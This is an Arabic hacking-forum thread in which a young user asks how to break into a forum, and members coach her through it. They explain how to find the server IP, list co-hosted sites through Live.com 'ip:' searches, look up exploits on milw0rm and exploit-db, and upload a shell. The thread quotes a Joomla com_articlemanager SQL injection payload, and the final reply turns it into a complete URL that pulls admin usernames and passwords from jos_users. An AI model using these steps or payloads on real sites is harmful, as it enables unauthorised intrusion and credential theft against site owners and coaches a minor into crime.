آرجو دخول محترفي ومبدعي [هـآكر الموآآقع] جعل آيديكم مآتمسآه النآر

[ღ}~ ملكة الهاكر ريماس ~{ღ]

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته ,,

تحية طيبة لكل آعضآء وآدآرة آلمنتدىآ آلمميز وآلرآئع ~

آخوآني محترفي آلهكر
آسعد آلله آوقآتكم وبآرك في حيآتكم وآرزآقكم ,,

طلب وآقسم بآلله لن آنسى من سيقدم لي هآذآ آلمعروف
وآني سإدعي له في كل سجدة

خطوآت آخترآق الموآقع
رؤؤس آقلآم مو شرح بآلتفصيل يعني آلفكرة ع آيش تعتمد ؟؟ .. !! ..

سؤال آخر ,,
بعد آلذهآب آلى آلدوس وكتآبة آلآمر Cmd ثم Ping ورآبط آلموقع آو آلمنتدىآ
سيظهر آيبي آلسيرفر آلذي يتوآجد عليه هذآ آلموقع آذآ ً الآن حروح لمحرك بحث Live.com وحكتب آلآيبي
بعد كتآبته حتطلع كل آلموآآآآآآآآآآآقع آلي ع هآلسيرفر تمآم الآن حطلع السكربت الي مركبه آحد هؤلآء آلموآقع
حكتب بعد آلآيبي Powered by
طيب بعد هآلخطوة آيش آعمل ؟؟ .. !! ..
آعرف آنو بعد مآ آعرف آلسكربت حروح لموووووووووووووقع آلميلآرووووم وحكتب آلسكربت آلي مركبه آحد هؤلآء الموآآآآآآقع

بعدهآ آيش آعمل ؟؟ .. !! ..

آلله يحرم آلنآر عليكم وآسئل آلله آن يجعل بسمتكم عآدة وحديثكم عبآدة وخآتمتكم شهآدة ورزقكم في زيآدة
وحيآتكم سعآدة وآن يدخلكم برضىآ منه آعلىآ جنة ويحقق لكم كل مآ تتمنىآ

آمين يآرب العآلمين ,,

آختكم

[Dr.NaNo]

وعليكم السلام ورحمة الله وبركاته





اخي طريقتك صحيحه لما تدخل على موقع الميلورم أبحث عن

ثغرات للسكربت تبع الموقع وبعدها شوف اثغرة بأي لغه

وترجمها لكي تخترق بها ..




انا لسى مبتدئ في هذا المجال وأن شاء الله أحترف فيه




ونسيت أن اخبرك ياغالي [ أذا تبي تبحث عن ثغرات أبحث في

الموقع الجديد والاصلي وهذا هو .:

www.exploit-db.com

وهذا الموقع البديل [ لان موقع المييلورم

www.milw0rm.com متعطل له أربع شهور ]




والموقع البديل أصبح جميل وفيه ثغرات جديدهـ ويسمونه

[ نسخة الميلورم ] لان أكثر الثغرات الي بـ موقع الميلورم

نقلوها ألى الموقع البديل



ونسيت ان أخبرك أيضأأ [ لاتبحث فقط عن السكربت أبحث

ثغرات عن نظام الموقع مثل [ اللنكسس ، والويندوز ]



وأفحص الموقع وأبحث عن ثغرات [ الاباتشي ، والويندوز ]

الاباتشي صعبه شوي لانها من مبرمجين مشهورين ويبيلها

شويه عقل



أما الويندوز سهل اختراقاها لانها [ من صنع شركه ماكروسفت ]



واذا لم تجد ثغرات في الموقع المراد أختراقه [ أبحث عن

المواقع الثانيه التي على السيرفر ويمكنك أستخراج

المواقع التي على السيرفر كامل عن طريق الاي بي تبع الموقع

المستهدف ]




وأن شاء الله تكون قد [ أخترقت اكثر من موقع ]




بالتوفيق يابطل

[ღ}~ ملكة الهاكر ريماس ~{ღ]

اقتباس المشاركة الأصلية كتبت بواسطة Dr.NaNo وعليكم السلام ورحمة الله وبركاته اخي طريقتك صحيحه لما تدخل على موقع الميلورم أبحث عن ثغرات للسكربت تبع الموقع وبعدها شوف اثغرة بأي لغه وترجمها لكي تخترق بها .. انا لسى مبتدئ في هذا المجال وأن شاء الله أحترف فيه ونسيت أن اخبرك ياغالي [ أذا تبي تبحث عن ثغرات أبحث في الموقع الجديد والاصلي وهذا هو .: www.exploit-db.com وهذا الموقع البديل [ لان موقع المييلورم www.milw0rm.com متعطل له أربع شهور ] والموقع البديل أصبح جميل وفيه ثغرات جديدهـ ويسمونه [ نسخة الميلورم ] لان أكثر الثغرات الي بـ موقع الميلورم نقلوها ألى الموقع البديل ونسيت ان أخبرك أيضأأ [ لاتبحث فقط عن السكربت أبحث ثغرات عن نظام الموقع مثل [ اللنكسس ، والويندوز ] وأفحص الموقع وأبحث عن ثغرات [ الاباتشي ، والويندوز ] الاباتشي صعبه شوي لانها من مبرمجين مشهورين ويبيلها شويه عقل أما الويندوز سهل اختراقاها لانها [ من صنع شركه ماكروسفت ] واذا لم تجد ثغرات في الموقع المراد أختراقه [ أبحث عن المواقع الثانيه التي على السيرفر ويمكنك أستخراج المواقع التي على السيرفر كامل عن طريق الاي بي تبع الموقع المستهدف ] وأن شاء الله تكون قد [ أخترقت اكثر من موقع ] بالتوفيق يابطل

يعطيك آلف عآفيه يآرب
وجزآك ربي آلجنة ويحقق لك كل مآتتمنىآ
يسعدك ربي يآرب

بس ملآحظة صغيرة بآلمرة
آخوي آنآ بنت مو ولد
بعضكم بل آكثركم يظن آن آلي بيتعلمو للهكر شبآب !!

لآ هذآ كلآم غير صحيح يشهد ربي علي في كل موآقع آلهكر آلي سجلت فيهآ
بآسمي آلحقيقي وآني بنت وحآبه آدخل للعلم آلهكرز وآبحر في ذآك العآلم آلجميل

وعندي كم سؤآل ممكن :-

كيف آعرف نظآم تشغيل آلسيرفر ؟؟ اللنكس ويندوز آلخ
ولمآ آدخل ع موقع الميلآروم وآخترت ثغرة بآيش آترجمهآ ؟؟ وكيف ومن وين ؟؟
صحيح معك حق آلمنتدىآ آلي حآبه آخترقه مآموجود فيه ثغرآت
لكن في موآقع ع نفس آلسيرفر آلي بيتوآجد عليه هذآ منتدىآ آلي حآبه آخترقه فيهآ ثغرآت

شآكره لك كثير ,,
جزآك ربي آلجنة

آختك

[ღ}~ ملكة الهاكر ريماس ~{ღ]

آآآآآآآآآرجو آآآآآآلرد

[KaLa$nikoV]

ممممممممممممممممم

من نقطه بنبدا المشواااااااار

اول شيء بنت ولا ولد مش مشكله بس لكن البعض متعود يتكلم للشباب بدون انتباه
(عادي في كثير بنات هكر )

النقطه الثانيه

الاستهداف يعد من اعقد الامور

وانا بدون اي مشكله بقول لك اني

استهدفت كثير سيرفرات
لكن حتى الان ما طلعت براس مع اي سيرفر منهم

يعني انا بالرغم من كل يلي بعرفه لسا ما عندي امكانيات اني اجيب سيرفر مستهدفه
:(

الاستهداف بيجي بعد احتراف معظم انواع الثغرات


والسبب

لنفرض انك عند دخولك موقع ميلورم

وجدتي ثغره باحد السكربتات
لكن انتي ما بتعرف ايش نوع الثغره
لنفرض انك عرفتيه

ما بتعرف استغلاله

يعني الشغله مش بيوم وليله
بتصير بدها تعلم كثير


انصحك شيء

لاحتراف الاختراق
(الاختراق هو قمه احتراف البرمجه )
لانك تجد اخطاء لا ينتبه لها غيرك من المبرمجين

ولذا انصحكي بتعلم البرمجه وخاصه php + mysql +asp +perl
واسمبلي في الحالات المتقدمه

كذا ما ضل نقول لكي غير بعد ما نحترف البرمجه
بنحمل حالنا بنتعلم كيف استغلال الثغرات
عندك دوره sql
+
دوره استغلال الثغرات
بتتعلميهم وبتتقنيهم وبعد كذا
بمسك نفسنا وبنحاول نخترق

انا شخصيا لما احاول اخترق سيرفر
ابدا بثغره
sql
لاني متقنها
وبعدها بنزل ميلورم اشوف ثغرات السكربتات

طيب ما لقيت بميلورم


(اذا كان الشيء مهم جدا )

بمسك مواقع السيرفر موقع موقع
وابلش فيها فحص ثغرات ولو اتضر احمل السكربت لجهازي وافحصه بجهازي
(طبعا عمري ما عملتها اذا ما زبط السيرفر بقله الله معاك )


اتمنا اني افدتك ولو بالقليل

[ღ}~ ملكة الهاكر ريماس ~{ღ]

اقتباس المشاركة الأصلية كتبت بواسطة VoLc4n0 ممممممممممممممممم من نقطه بنبدا المشواااااااار اول شيء بنت ولا ولد مش مشكله بس لكن البعض متعود يتكلم للشباب بدون انتباه (عادي في كثير بنات هكر ) النقطه الثانيه الاستهداف يعد من اعقد الامور وانا بدون اي مشكله بقول لك اني استهدفت كثير سيرفرات لكن حتى الان ما طلعت براس مع اي سيرفر منهم يعني انا بالرغم من كل يلي بعرفه لسا ما عندي امكانيات اني اجيب سيرفر مستهدفه :( الاستهداف بيجي بعد احتراف معظم انواع الثغرات والسبب لنفرض انك عند دخولك موقع ميلورم وجدتي ثغره باحد السكربتات لكن انتي ما بتعرف ايش نوع الثغره لنفرض انك عرفتيه ما بتعرف استغلاله يعني الشغله مش بيوم وليله بتصير بدها تعلم كثير انصحك شيء لاحتراف الاختراق (الاختراق هو قمه احتراف البرمجه ) لانك تجد اخطاء لا ينتبه لها غيرك من المبرمجين ولذا انصحكي بتعلم البرمجه وخاصه php + mysql +asp +perl واسمبلي في الحالات المتقدمه كذا ما ضل نقول لكي غير بعد ما نحترف البرمجه بنحمل حالنا بنتعلم كيف استغلال الثغرات عندك دوره sql + دوره استغلال الثغرات بتتعلميهم وبتتقنيهم وبعد كذا بمسك نفسنا وبنحاول نخترق انا شخصيا لما احاول اخترق سيرفر ابدا بثغره sql لاني متقنها وبعدها بنزل ميلورم اشوف ثغرات السكربتات طيب ما لقيت بميلورم (اذا كان الشيء مهم جدا ) بمسك مواقع السيرفر موقع موقع وابلش فيها فحص ثغرات ولو اتضر احمل السكربت لجهازي وافحصه بجهازي (طبعا عمري ما عملتها اذا ما زبط السيرفر بقله الله معاك ) اتمنا اني افدتك ولو بالقليل

جعل آيديك مآتمسآه النآر
وآسئل المولىآ آن يدخلك برضىآ منه آعلى جنة ويحقق لك كل مآتتمنىآ

آختك

[HaCkEr-By-MaROcO]

السلام عليكم

اختي عندمى تلقي سركيبت لاي مركب عليه الموقع ادهبي الى www.milw0rm.com

واكتبي اسم السكريبت وراح يعطيك الاستغلال الكامل

بتوفيق

[ღ}~ ملكة الهاكر ريماس ~{ღ]

اقتباس المشاركة الأصلية كتبت بواسطة HaCkEr-By-MaROcO السلام عليكم اختي عندمى تلقي سركيبت لاي مركب عليه الموقع ادهبي الى www.milw0rm.com واكتبي اسم السكريبت وراح يعطيك الاستغلال الكامل بتوفيق

صحيح معك حق تطلع لي بس كيف آعرف آيش آلمقصود آترجمهآ ؟؟ كيف ؟؟ ومن وين ؟؟

يآليت يآ آخوي تشرح آكثر

وآسئل آلله آلكريم آلرحيم آن يدخلك جنآت النعيم ويجعلك حآفظآ للقرآن آلكريم
جعل يديك مآتمسآه آلنآر يآرب

آدعو آلله آن يدخلك آلجنة وبرضىآ منه يحقق لك كل مآتتمنىآ
ويسعدك ويوفقك ويجزآك كل خير

آحلى تقيم ليك وتستآهل آكثر
دعوآت ٍ لك لن تنقطع ..

سلمت آيدك

آختك

[HaCkEr-By-MaROcO]

اختي نفترض انك لقيتي تغرة في www.milw0rm.com راح تلقى مكتوب exploit

يعني اسغلال الكامل الان ادحبي الى الموقع واكتبو الاستغلال وراء الموقع ادا اكن مصاب راح يضهر لك الباسورد مشفر و يوزر

وانا انصحك تتعلمي تغرة sql لانهى سهل وهناك دورة في المنتدى صوت وصورة

اتنمنى اكون افدتك

بتوفيق

[ღ}~ ملكة الهاكر ريماس ~{ღ]

اقتباس المشاركة الأصلية كتبت بواسطة HaCkEr-By-MaROcO اختي نفترض انك لقيتي تغرة في www.milw0rm.com راح تلقى مكتوب exploit يعني اسغلال الكامل الان ادحبي الى الموقع واكتبو الاستغلال وراء الموقع ادا اكن مصاب راح يضهر لك الباسورد مشفر و يوزر وانا انصحك تتعلمي تغرة sql لانهى سهل وهناك دورة في المنتدى صوت وصورة اتنمنى اكون افدتك بتوفيق

جعل ايديك ماتمساه النار يارب والله يحقق مبتغاك ويسعدك دوم ويجزاك كل خير

عملت كل الي قلت عليه

وطلع لي موقع بعد كتابة ايبي السيرفر وكتابة Powered by Joomla

Joomla كتبتها في موقع البحث عن الثغرات البديل عن الميلاروم

اخترتها وطلعت لي

# Title: Joomla Component com_articlemanager SQL Injection Vulnerability
# EDB-ID: 11140
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-14
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
################################################## ######################
# Joomla Component com_articlemanager SQL Injection Vulnerability
################################################## ######################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com...display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
################################################## ######################

ايش الي انسخه والصقه خلف رابط الموقع
الي لما كتبت في محرك live.com الايبي والبورد بي طلعت لي joomla

ارجوكم ساعدوني

اختكم

[Cyber Code]

اختي الكرـيمة لاختراق موقع معـين

اول شيء بتطلعي الايبي تبعه وذالك عبر

Start>RUN>Cmd

ping www.xxx.com

حلو بعـد ماتطلعي الاّيبي معاكي طريقتين

الأولى : تشوفي الموقع وش من سكربتات مركبها ,, وافحصي ثغراته , اذا طلعتي ثغره استغليها واخترقي الموقع , وكمان اذا لقيتي اي سكربت روحي شوفي جميع المعلومات الي تقدري تطليعها من السكربت مثلا الاصدار الاسم

تروحي ع الميل ورم وتدخلي ع Search واكتبي اسم السكربت مثلا Joomla v 2.0 اوـكي بيطلع لك ثغراات كثير اختاري احدث وحده واستغليها , واخترقي الموقع

الطرـيقه الثانيه روحي ع live.com واكتبي : ip:xxxxxx

xxxx = ايبي السرفر الي طلعتيه من الدوز

بيطلع لك كل المواقع الي ع السرفر الان ممكن تبحثي ع موقع موقع ع السريع حتى تلقي واحد مصاب بسكربت فيه ثغرة

استغليها وادعسي الموقع

طـبعا بتحتاجي تتعلمي الثغرات وانواعها واستغلالاتها , وكمان لغة ال perl + php + SqL + html هذي اللغات لو اتعلمتيها بتحترفي اختراق المواقع اسرع ,

وطريقة معرفة انه النضام : windows or linux بتعرفي بعد رفع الشل

روحي ع دورة فولكاانو للحقن وركزي فيها كثير بتخترقي مواقع كثيير وكمان اجنبيه وممخلة في الاسلام ال SQL اكثر ثغره مشهوره

وان شاء الله مع الوقت بتحترفي

سلاام

اخوك Dark Light

[ღ}~ ملكة الهاكر ريماس ~{ღ]

اقتباس المشاركة الأصلية كتبت بواسطة Dark Light اختي الكرـيمة لاختراق موقع معـين اول شيء بتطلعي الايبي تبعه وذالك عبر Start>RUN>Cmd ping www.xxx.com حلو بعـد ماتطلعي الاّيبي معاكي طريقتين الأولى : تشوفي الموقع وش من سكربتات مركبها ,, وافحصي ثغراته , اذا طلعتي ثغره استغليها واخترقي الموقع , وكمان اذا لقيتي اي سكربت روحي شوفي جميع المعلومات الي تقدري تطليعها من السكربت مثلا الاصدار الاسم تروحي ع الميل ورم وتدخلي ع Search واكتبي اسم السكربت مثلا Joomla v 2.0 اوـكي بيطلع لك ثغراات كثير اختاري احدث وحده واستغليها , واخترقي الموقع الطرـيقه الثانيه روحي ع live.com واكتبي : ip:xxxxxx xxxx = ايبي السرفر الي طلعتيه من الدوز بيطلع لك كل المواقع الي ع السرفر الان ممكن تبحثي ع موقع موقع ع السريع حتى تلقي واحد مصاب بسكربت فيه ثغرة استغليها وادعسي الموقع طـبعا بتحتاجي تتعلمي الثغرات وانواعها واستغلالاتها , وكمان لغة ال perl + php + SqL + html هذي اللغات لو اتعلمتيها بتحترفي اختراق المواقع اسرع , وطريقة معرفة انه النضام : windows or linux بتعرفي بعد رفع الشل روحي ع دورة فولكاانو للحقن وركزي فيها كثير بتخترقي مواقع كثيير وكمان اجنبيه وممخلة في الاسلام ال SQL اكثر ثغره مشهوره وان شاء الله مع الوقت بتحترفي سلاام اخوك Dark Light

انا ما اقول الا
الله يعطيك الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف الف عاااااااااااااااافيه

وحينما يظهر للأبداع عنوان ويظهر الأنسان
جماله وروعته في ردوده

يجب علي آن آقدم شكري له ودعائي لك لن ينقطع

وفقك الله ورعاك وحقق مبتغاك والله يسعدك ويسدد خطاك
ويحرم النار عليك يارب

اعجز عن شكرك يا اخي

اختك

[Cyber Code]

وللنسبه للترجمه

طبعا كل ثغره ولها استغلالها عشان كذاا انصحك تتعلمي لغات البرمجه الي ذكرتها فوق لانها بتنفع كثير

واذا تابعتي دورة فولكانو بتتعلمي كيف تستغلي ثغرات ال SQL

وفي ثغرات مكتوبة في لغات ال Perl >> شفتي كيف تنفع اللغه هذي

ومن ال php بتتعلمي تطلعي الثغرات من السكربتات وحتى برمجة سكربتات
واشياء اكثر

اذا في اختراق المواقع ركزي اكثير شيء ع حاجتين فقط

اولا : لغات البرمجه

ثانيا : الثغرات

[ღ}~ ملكة الهاكر ريماس ~{ღ]

آخوآني الله يسعدكم ردوا علي وربي ماكذبت عليكم

حروح انام بس لما اشوف ردودكم لأن عندي دوام والله انا بدرس ثالث متوسط

الله يسعدكم ردوا علي خطواتي صح والله لا

بعدما كتابة ايبي السيرفر وكتابة Powered by Joomla
في محرك بحث live.com

نسخة
Joomla وكتبتها في موقع البحث عن الثغرات البديل عن الميلاروم

اخترتها وطلعت لي

# Title: Joomla Component com_articlemanager SQL Injection Vulnerability
# EDB-ID: 11140
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-14
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
################################################## ######################
# Joomla Component com_articlemanager SQL Injection Vulnerability
################################################## ######################
# Author :FL0RiX
#
# Name : com_articlemanager
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option...display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
################################################## ######################

ايش الي انسخه والصقه خلف رابط الموقع
الي لما كتبت في محرك live.com الايبي والبورد بي طلعت لي joomla

فياريت تخبروني الله يجزاااااكم كل خييييييييييير

[Cyber Code]

يقلك ان السكربت مصاب , بثغرة نوع الثغرة "SQL"

مثال ع الثغرة

http://[server]/index.php?option...display&artid=

Server = اكتبي الموقع المصاب وسوي مثل الرابط الي فوق

الاستغلال
null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users

بيـكون :
http://www.server.com/index.php?opti...splay&artid=-2 union select 1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8 +from+jos_users

عدد الاعمدة = 8 العمود المصاب = رقم 4

concat(username,0x3a,password)fl0rix أمر يطلع لك باسورد ويوزر القاعدة

ان شاء الله يكون مفهوم ع العموم قلت لك تابعي دورة فولكانو وكلها مرفوعه ع اليوتيوب بتوصلك لاحتراف الحقن ان شاء الله